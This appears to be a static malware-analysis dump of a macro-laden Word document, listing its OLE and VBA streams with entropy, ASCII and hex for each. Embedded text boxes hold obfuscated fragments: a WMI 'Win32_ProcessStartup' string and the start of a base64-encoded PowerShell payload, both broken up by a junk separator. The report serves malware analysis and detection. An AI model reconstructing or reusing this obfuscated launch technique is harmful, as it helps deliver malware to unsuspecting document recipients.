                Data ASCII:I D = " { 5 2 C 1 0 B 4 C - A E 1 B - 4 6 9 F - B D 6 9 - 1 5 7 4 B C A 3 5 2 7 B } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = s n L F 1 V . . M o d u l e = J I o d C j f v . . H e l p F i l e = " m h C 4 O 0 H p " . . E x e N a m e 3 2 = " m c z 5 Y Q o 6 " . . N a m e = " R q s D M _ " . . H e l p C o n t e x t I D = " 0 " . . D e s c r i p t i o n = " X a 4 G a A " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 3 D 1 2 2 4 F
                Data Raw:49 44 3d 22 7b 35 32 43 31 30 42 34 43 2d 41 45 31 42 2d 34 36 39 46 2d 42 44 36 39 2d 31 35 37 34 42 43 41 33 35 32 37 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 73 6e 4c 46 31 56 0d 0a 4d 6f 64 75 6c 65 3d 4a 49 6f 64 43 6a 66 76 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 6d 68 43 34 4f 30 48
                Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 89
                General
                Stream Path:Macros/PROJECTwm
                File Type:data
                Stream Size:89
                Entropy:3.59090450368
                Base64 Encoded:False
                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . s n L F 1 V . s . n . L . F . 1 . V . . . J I o d C j f v . J . I . o . d . C . j . f . v . . . . .
                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 73 6e 4c 46 31 56 00 73 00 6e 00 4c 00 46 00 31 00 56 00 00 00 4a 49 6f 64 43 6a 66 76 00 4a 00 49 00 6f 00 64 00 43 00 6a 00 66 00 76 00 00 00 00 00
                Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 16910
                General
                Stream Path:Macros/VBA/_VBA_PROJECT
                File Type:data
                Stream Size:16910
                Entropy:5.54553098729
                Base64 Encoded:True
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2114
                General
                Stream Path:Macros/VBA/__SRP_0
                File Type:data
                Stream Size:2114
                Entropy:4.65721405944
                Base64 Encoded:False
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ h . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . p & . . . L . j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 02 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00
                Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 507
                General
                Stream Path:Macros/VBA/__SRP_1
                File Type:data
                Stream Size:507
                Entropy:4.07674775518
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . a . . . . . . . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X a 4 G a A . . . . . . . . m h C 4 O 0 H p . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . F i k b d Q Z . . . . i . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . N 2 S p O i I D . . . . . . . . m w X I 7 m . . . . . . .
                Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 61 00 00 00 00 00 01 00 79 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 02 00 00 08 06 00 00 00 58 61 34 47 61 41 03 00 00 08 08 00 00 00 6d 68 43 34 4f 30 48 70 03 00 00 09 69 07 00 00
                Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 2956
                General
                Stream Path:Macros/VBA/__SRP_2
                File Type:data
                Stream Size:2956
                Entropy:2.53035163856
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 80 02 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 15 00 e1 03 00 00 00 00 00 00 09 08 00 00 00 00 00 00 31 08 00 00 00 00 00 00 09 00 00 00 01 00 02 00 c1 07 00 00 00 00 00 00 0a 00 0e 00 38 00 00 00 59 08 00 00 00 00 00 00 99 00 00 00 00 00
                Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 846
                General
                Stream Path:Macros/VBA/__SRP_3
                File Type:data
                Stream Size:846
                Entropy:3.09934303505
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . < . . . . 1 . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . D . . . . I . . . . . . . . . . . . . . . . . . @ . . 4 . . . . . . . . . . T . . . . i . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 e0 00 00 00 04 00 14 00 20 00 d9 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 00 00 04 40 02 00 04 07 1d f1 00 00 00 00 00 01 00 34 00 00 00 20 00 11 01 00 00 00 00 01 00 ff ff ff ff 01 00 00 00 01 00 04 40 02 00 10 07 1d f1 00 00 00 00 00 01 00
                Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 901
                General
                Stream Path:Macros/VBA/dir
                File Type:data
                Stream Size:901
                Entropy:6.47934500425
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . R q s D M _ . . , . X a 4 G a A @ . . . . . X . a . 4 . * G . . A . 6 . . " m h . C 4 O 0 H p = . } . . . . . . < . * . . . . . A . . C . i _ . K . $ . < . . . . . e s t d o l e > . . s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ s y s t e m . 3 2 \\ . 2 2 . t l . b # O L E A u . t o m a t i o n . . 0 . . . E N o r m a . l . E
                Data Raw:01 81 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 06 00 1c 80 52 71 73 44 4d 5f 05 02 2c 00 58 61 34 47 61 41 40 00 02 0c 00 2e 58 00 61 00 34 00 2a 47 00 0a 41 00 36 08 00 22 6d 68 00 43 34 4f 30 48 70 3d 00 7d 09 1a 07 02 ae 00 3c 00 2a 01 ea 01 12 09 41 02 13 43 d2 69 5f 20 02 4b 00 24 00 3c 01 16 00 16 02 65 73 74 20 64 6f 6c 65
                Stream Path: ObjectPool/_1630480601/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480601/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480601/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480601/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Data ASCII:F . i . k . b . d . Q . Z . . . . . . .
                Data Raw:46 00 69 00 6b 00 62 00 64 00 51 00 5a 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480601/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480601/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480601/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480601/contents
                File Type:data
                Stream Size:64
                Entropy:3.55239648336
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . z n l 2 l 8 i 3 . . . . 5 . . . . . . . . . . . . . . . C a l i b r i 3
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 7a 6e 6c 32 6c 38 69 33 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 33
                Stream Path: ObjectPool/_1630480602/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480602/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480602/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480602/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:2.17095059445
                Base64 Encoded:False
                Data ASCII:N . 2 . S . p . O . i . I . D . . . . .
                Data Raw:4e 00 32 00 53 00 70 00 4f 00 69 00 49 00 44 00 00 00 00 00
                Stream Path: ObjectPool/_1630480602/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480602/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480602/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480602/contents
                File Type:data
                Stream Size:64
                Entropy:3.5759867178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . B 0 0 2 l n 7 3 . . . . 5 . . . . . . . . . . . . . . . C a l i b r i 3
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 42 30 30 32 6c 6e 37 33 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 33
                Stream Path: ObjectPool/_1630480603/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480603/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480603/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480603/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.55677964945
                Base64 Encoded:False
                Data ASCII:m . w . X . I . 7 . m . . . . . . . . .
                Data Raw:6d 00 77 00 58 00 49 00 37 00 6d 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480603/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480603/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480603/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480603/contents
                File Type:data
                Stream Size:64
                Entropy:3.59544160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . I V i 9 m s n 3 . . . . 5 . . . . . . . . . . . . . . . C a l i b r i 3
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 49 56 69 39 6d 73 6e 33 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 33
                Stream Path: ObjectPool/_1630480604/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480604/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480604/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480604/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:2.17095059445
                Base64 Encoded:False
                Data ASCII:P . 8 . 3 . A . c . X . T . u . . . . .
                Data Raw:50 00 38 00 33 00 41 00 63 00 58 00 54 00 75 00 00 00 00 00
                Stream Path: ObjectPool/_1630480604/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480604/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480604/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480604/contents
                File Type:data
                Stream Size:64
                Entropy:3.6072367178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . F I C 9 7 a z 3 . . . . 5 . . . . . . . . . . . . . . . C a l i b r i 3
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 08 00 00 80 1a 00 00 00 1a 00 00 00 46 49 43 39 37 61 7a 33 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 33
                Stream Path: ObjectPool/_1630480605/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480605/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480605/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480605/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Data ASCII:Q . F . a . 7 . T . z . v . . . . . . .
                Data Raw:51 00 46 00 61 00 37 00 54 00 7a 00 76 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480605/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480605/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480605/contents, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480605/contents
                File Type:data
                Stream Size:116
                Entropy:4.39351761296
                Base64 Encoded:False
                Data ASCII:. . T . . . @ . . . . . . H . , 9 . . . . . . . . . . . w i n m I u H 3 g m t s I u H 3 : W i n I u H 3 3 2 _ P I u H 3 r o c e I u H 3 s s S t I u H 3 a r t u I u H 3 p . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                Data Raw:00 02 54 00 01 01 40 80 00 00 00 00 1b 48 80 2c 39 00 00 80 1a 00 00 00 1a 00 00 00 77 69 6e 6d 49 75 48 33 67 6d 74 73 49 75 48 33 3a 57 69 6e 49 75 48 33 33 32 5f 50 49 75 48 33 72 6f 63 65 49 75 48 33 73 73 53 74 49 75 48 33 61 72 74 75 49 75 48 33 70 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f
                Stream Path: ObjectPool/_1630480606/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480606/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480606/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480606/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:2.17095059445
                Base64 Encoded:False
                Data ASCII:T . C . R . M . 9 . s . q . j . . . . .
                Data Raw:54 00 43 00 52 00 4d 00 39 00 73 00 71 00 6a 00 00 00 00 00
                Stream Path: ObjectPool/_1630480606/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480606/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480606/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480606/contents
                File Type:data
                Stream Size:64
                Entropy:3.5759867178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . S i s U 0 T i o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 53 69 73 55 30 54 69 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f
                Stream Path: ObjectPool/_1630480607/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480607/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480607/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480607/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:V . E . Y . j . p . 2 . . . . . . . . .
                Data Raw:56 00 45 00 59 00 6a 00 70 00 32 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480607/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480607/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480607/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480607/contents
                File Type:data
                Stream Size:64
                Entropy:3.53294160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . T j i z 2 o i o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 54 6a 69 7a 32 6f 69 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f
                Stream Path: ObjectPool/_1630480608/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480608/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480608/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480608/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:2.17095059445
                Base64 Encoded:False
                Data ASCII:V . H . f . L . _ . K . 2 . S . . . . .
                Data Raw:56 00 48 00 66 00 4c 00 5f 00 4b 00 32 00 53 00 00 00 00 00
                Stream Path: ObjectPool/_1630480608/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480608/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480608/contents, File Type: data, Stream Size: 4420
                General
                Stream Path:ObjectPool/_1630480608/contents
                File Type:data
                Stream Size:4420
                Entropy:3.95961733751
                Base64 Encoded:False
                Data ASCII:. . $ . . . @ . . . . . . H . , . . . . . . . . . . . . J A B I u H 3 t A E I u H 3 g A S I u H 3 w B 3 I u H 3 A F I I u H 3 A R g I u H 3 A 9 A I u H 3 C c A I u H 3 S g B I u H 3 J A G I u H 3 I A b I u H 3 g B 2 I u H 3 A G Y I u H 3 A b w I u H 3 B M A I u H 3 C c A I u H 3 O w A I u H 3 k A G I u H 3 I A M I u H 3 w B h I u H 3 A F M I u H 3 A a Q I u H 3 B t A I u H 3 D Q A I u H 3 X w A I u H 3 g A D I u H 3 0 A I I u H 3 A A n I u H 3 A D k I u H 3 A O A I u H 3 A y A I u H 3 C c A I u H 3 O w A I
